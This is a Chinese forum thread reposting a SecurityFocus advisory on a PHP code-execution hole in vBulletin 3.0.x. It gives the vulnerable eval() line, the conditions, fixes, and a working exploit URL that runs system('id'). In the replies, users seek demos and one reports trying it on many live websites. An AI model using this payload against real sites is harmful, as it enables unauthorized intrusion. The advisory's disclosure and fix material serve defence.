[转载]vbulletin 3.0.x PHP代码执行漏洞
信息来源:[url]www.securityfocus.com[/url]Vulnerable Systems:
----------------
vBulletin version 3.0 up to and including version 3.0.4
Immune systems:
----------------
vBulletin version 3.0.5
vBulletin version 3.0.6
Vulnerable code in forumdisplay.php :
#############################################################
if ($vboptions['showforumusers'])
{
.
.
.
.
if ($bbuserinfo['userid'])
{
.
.
.
.
$comma = ', ';
}
.
.
.
.
while ($loggedin = $DB_site->fetch_array($forumusers))
{
.
.
.
eval('$activeusers .= "' . $comma . fetch_template('forumdisplay_loggedinuser')
. '";'); <<==== (Vuln)
$comma = ', ';
.
.
}
.
.
}
#############################################################
Conditions:
----------------
1st condition : $vboptions['showforumusers'] == True , the admin must set
showforumusers ON in vbulletin options.
2nd condition : $bbuserinfo['userid'] == 0 , you must be an visitor/guest
.
3rd condition : $DB_site->fetch_array($forumusers) == True , when you
visit the forums, it must has at least one user show the forum.
4th condition : magic_quotes_gpc must be OFF
SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
init.php by secret array GLOBALS[]=1 ;)))
Solutions:
----------------
* Disable showforumusers in vbulletin options .
* add the next line before if ($vboptions['showforumusers'])
$comma = '';
Exploit:
----------------
example :
[url]http://site/forumdisplay.php?GLOBALS[/url][]=1&f=2&comma=".system('id')." I'd love it!
哈哈.正好需要! 有人成功了吗,发个动画看看~~
4th condition : magic_quotes_gpc must be OFF
又是这玩意....实用性大打折扣 确实如此
今天中午特意找了N个网站测试-------均没有成功
呵呵 [quote][b]下面是引用sniper于2005-02-18 16:05发表的:[/b]
有人成功了吗,发个动画看看~~
4th condition : magic_quotes_gpc must be OFF
又是这玩意....实用性大打折扣[/quote]
VBB还要 magic_quotes_gpc OFF
是有点苛刻了...
页:
[1]